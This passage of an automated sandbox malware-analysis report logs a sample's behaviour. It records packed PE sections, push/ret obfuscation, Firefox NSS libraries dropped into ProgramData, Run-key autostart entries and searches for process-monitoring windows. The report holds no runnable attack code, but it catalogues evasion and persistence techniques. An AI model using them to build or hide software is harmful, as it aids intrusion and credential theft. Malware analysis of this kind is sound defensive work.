Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1820160 > 1048576
Source: file.exe Static PE information: Raw size of kntikdlf is bigger than: 0x100000 < 0x1a2a00
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2522999551.000000006CB4D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2523239929.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2523239929.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: be33d1b9ea.exe, 00000020.00000003.2930938590.0000000004860000.00000004.00001000.00020000.00000000.sdmp, be33d1b9ea.exe, 00000020.00000002.3064925869.0000000000FA2000.00000040.00000001.01000000.00000010.sdmp, be33d1b9ea.exe, 00000022.00000002.3125430336.0000000000FA2000.00000040.00000001.01000000.00000010.sdmp, be33d1b9ea.exe, 00000022.00000003.3085015043.0000000005400000.00000004.00001000.00020000.00000000.sdmp, be33d1b9ea.exe, 00000025.00000002.3371914234.0000000000FA2000.00000040.00000001.01000000.00000010.sdmp, be33d1b9ea.exe, 00000025.00000003.3331506896.0000000005480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2522999551.000000006CB4D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.1a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;kntikdlf:EW;xdprgvya:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;kntikdlf:EW;xdprgvya:EW;.taggant:EW;
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Unpacked PE file: 22.2.DocumentsECBGHCGCBK.exe.460000.0.unpack :EW;.rsrc:W;.idata :W;xgavsnrb:EW;dcsjrelb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;xgavsnrb:EW;dcsjrelb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 23.2.skotes.exe.40000.0.unpack :EW;.rsrc:W;.idata :W;xgavsnrb:EW;dcsjrelb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;xgavsnrb:EW;dcsjrelb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Unpacked PE file: 26.2.28d9ab8742.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W;haojiwdb:EW;htquzmvw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;haojiwdb:EW;htquzmvw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Unpacked PE file: 27.2.3daf81f16e.exe.910000.0.unpack :EW;.rsrc :W;.idata :W; :EW;kntikdlf:EW;xdprgvya:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;kntikdlf:EW;xdprgvya:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Unpacked PE file: 31.2.28d9ab8742.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W;haojiwdb:EW;htquzmvw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;haojiwdb:EW;htquzmvw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Unpacked PE file: 32.2.be33d1b9ea.exe.fa0000.0.unpack :EW;.rsrc:W;.idata :W;jnqrnwwi:EW;fifesqlp:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Unpacked PE file: 33.2.3daf81f16e.exe.910000.0.unpack :EW;.rsrc :W;.idata :W; :EW;kntikdlf:EW;xdprgvya:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;kntikdlf:EW;xdprgvya:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Unpacked PE file: 34.2.be33d1b9ea.exe.fa0000.0.unpack :EW;.rsrc:W;.idata :W;jnqrnwwi:EW;fifesqlp:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Unpacked PE file: 35.2.28d9ab8742.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W;haojiwdb:EW;htquzmvw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;haojiwdb:EW;htquzmvw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Unpacked PE file: 36.2.3daf81f16e.exe.910000.0.unpack :EW;.rsrc :W;.idata :W; :EW;kntikdlf:EW;xdprgvya:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;kntikdlf:EW;xdprgvya:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Unpacked PE file: 37.2.be33d1b9ea.exe.fa0000.0.unpack :EW;.rsrc:W;.idata :W;jnqrnwwi:EW;fifesqlp:EW;.taggant:EW; vs :ER;.rsrc:W;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAD3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6CAD3480
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: 28d9ab8742.exe.24.dr Static PE information: real checksum: 0x325d5c should be: 0x328867
Source: 3daf81f16e.exe.24.dr Static PE information: real checksum: 0x1cae3f should be: 0x1c281b
Source: DocumentsECBGHCGCBK.exe.0.dr Static PE information: real checksum: 0x31aba7 should be: 0x30c13d
Source: random[1].exe.24.dr Static PE information: real checksum: 0x1cae3f should be: 0x1c281b
Source: file.exe Static PE information: real checksum: 0x1cae3f should be: 0x1c281b
Source: be33d1b9ea.exe.24.dr Static PE information: real checksum: 0x2afdbe should be: 0x2b29b3
Source: random[1].exe.0.dr Static PE information: real checksum: 0x325d5c should be: 0x328867
Source: random[1].exe0.24.dr Static PE information: real checksum: 0x2afdbe should be: 0x2b29b3
Source: skotes.exe.22.dr Static PE information: real checksum: 0x31aba7 should be: 0x30c13d
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: kntikdlf
Source: file.exe Static PE information: section name: xdprgvya
Source: file.exe Static PE information: section name: .taggant
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: DocumentsECBGHCGCBK.exe.0.dr Static PE information: section name:
Source: DocumentsECBGHCGCBK.exe.0.dr Static PE information: section name: .idata
Source: DocumentsECBGHCGCBK.exe.0.dr Static PE information: section name: xgavsnrb
Source: DocumentsECBGHCGCBK.exe.0.dr Static PE information: section name: dcsjrelb
Source: DocumentsECBGHCGCBK.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name: haojiwdb
Source: random[1].exe.0.dr Static PE information: section name: htquzmvw
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: skotes.exe.22.dr Static PE information: section name:
Source: skotes.exe.22.dr Static PE information: section name: .idata
Source: skotes.exe.22.dr Static PE information: section name: xgavsnrb
Source: skotes.exe.22.dr Static PE information: section name: dcsjrelb
Source: skotes.exe.22.dr Static PE information: section name: .taggant
Source: 28d9ab8742.exe.24.dr Static PE information: section name:
Source: 28d9ab8742.exe.24.dr Static PE information: section name: .idata
Source: 28d9ab8742.exe.24.dr Static PE information: section name: haojiwdb
Source: 28d9ab8742.exe.24.dr Static PE information: section name: htquzmvw
Source: 28d9ab8742.exe.24.dr Static PE information: section name: .taggant
Source: random[1].exe.24.dr Static PE information: section name:
Source: random[1].exe.24.dr Static PE information: section name: .rsrc
Source: random[1].exe.24.dr Static PE information: section name: .idata
Source: random[1].exe.24.dr Static PE information: section name:
Source: random[1].exe.24.dr Static PE information: section name: kntikdlf
Source: random[1].exe.24.dr Static PE information: section name: xdprgvya
Source: random[1].exe.24.dr Static PE information: section name: .taggant
Source: 3daf81f16e.exe.24.dr Static PE information: section name:
Source: 3daf81f16e.exe.24.dr Static PE information: section name: .rsrc
Source: 3daf81f16e.exe.24.dr Static PE information: section name: .idata
Source: 3daf81f16e.exe.24.dr Static PE information: section name:
Source: 3daf81f16e.exe.24.dr Static PE information: section name: kntikdlf
Source: 3daf81f16e.exe.24.dr Static PE information: section name: xdprgvya
Source: 3daf81f16e.exe.24.dr Static PE information: section name: .taggant
Source: random[1].exe0.24.dr Static PE information: section name:
Source: random[1].exe0.24.dr Static PE information: section name: .idata
Source: random[1].exe0.24.dr Static PE information: section name: jnqrnwwi
Source: random[1].exe0.24.dr Static PE information: section name: fifesqlp
Source: random[1].exe0.24.dr Static PE information: section name: .taggant
Source: be33d1b9ea.exe.24.dr Static PE information: section name:
Source: be33d1b9ea.exe.24.dr Static PE information: section name: .idata
Source: be33d1b9ea.exe.24.dr Static PE information: section name: jnqrnwwi
Source: be33d1b9ea.exe.24.dr Static PE information: section name: fifesqlp
Source: be33d1b9ea.exe.24.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB0B536 push ecx; ret 0_2_6CB0B549
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: 22_2_0047D91C push ecx; ret 22_2_0047D92F
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: 22_2_00471359 push es; ret 22_2_0047135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_0005D91C push ecx; ret 23_2_0005D92F
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00CD4CDC pushfd ; ret 26_3_00CD4CF2
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00CD68DC pushfd ; ret 26_3_00CD6916
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00CD63D4 pushfd ; ret 26_3_00CD6596
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00CD4BFF pushfd ; ret 26_3_00CD4C02
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00CD66A0 pushfd ; ret 26_3_00CD6756
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00CD5041 pushfd ; ret 26_3_00CD504E
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00CD4958 push eax; retf 26_3_00CD4961
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00CD6675 pushfd ; ret 26_3_00CD6676
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00CD6D74 pushfd ; ret 26_3_00CD6DAA
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00CD6B39 pushfd ; ret 26_3_00CD6C5E
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00CD4B30 pushfd ; ret 26_3_00CD4B5A
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00CCF401 push esi; retf 26_3_00CCF6F9
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00CC732C push es; retn 0000h 26_3_00CC7596
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00C6D4C7 push ebp; retf 26_3_00C6D4CA
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00C6D4C0 push ebp; retf 26_3_00C6D4C2
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00C6D4CF push ebp; retf 26_3_00C6D4D2
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00C6D4DC push esi; retf 26_3_00C6D4E2
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00C6D4E8 push esi; retf 26_3_00C6D4EA
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00C6D4F1 push esi; retf 26_3_00C6D4F2
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00C6D6F8 pushfd ; retf 26_3_00C6D6F9
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00C6D4F9 push edi; retf 26_3_00C6D4FA
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00C6D484 push esp; retf 26_3_00C6D48A
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00C6D480 push ebx; retf 26_3_00C6D482
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00C6D490 push esp; retf 26_3_00C6D492
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00C6D499 push esp; retf 26_3_00C6D49A
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00C6D4A1 push esp; retf 26_3_00C6D4A2
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00C6D4A8 push edi; retf 26_3_00C6D51A
Source: file.exe Static PE information: section name: kntikdlf entropy: 7.95335449432148
Source: DocumentsECBGHCGCBK.exe.0.dr Static PE information: section name: entropy: 7.026037966205663
Source: random[1].exe.0.dr Static PE information: section name: entropy: 7.013699778680479
Source: skotes.exe.22.dr Static PE information: section name: entropy: 7.026037966205663
Source: 28d9ab8742.exe.24.dr Static PE information: section name: entropy: 7.013699778680479
Source: random[1].exe.24.dr Static PE information: section name: kntikdlf entropy: 7.95335449432148
Source: 3daf81f16e.exe.24.dr Static PE information: section name: kntikdlf entropy: 7.95335449432148
Source: random[1].exe0.24.dr Static PE information: section name: entropy: 7.810928621903578
Source: be33d1b9ea.exe.24.dr Static PE information: section name: entropy: 7.810928621903578

Persistence and Installation Behavior
barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsECBGHCGCBK.exe Jump to dropped file
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\DocumentsECBGHCGCBK.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsECBGHCGCBK.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the user directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsECBGHCGCBK.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 28d9ab8742.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3daf81f16e.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run be33d1b9ea.exe
Drops PE files to the user root directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsECBGHCGCBK.exe Jump to dropped file
Monitors registry run keys for changes
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Window searched: window name: RegmonClass
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: FilemonClass
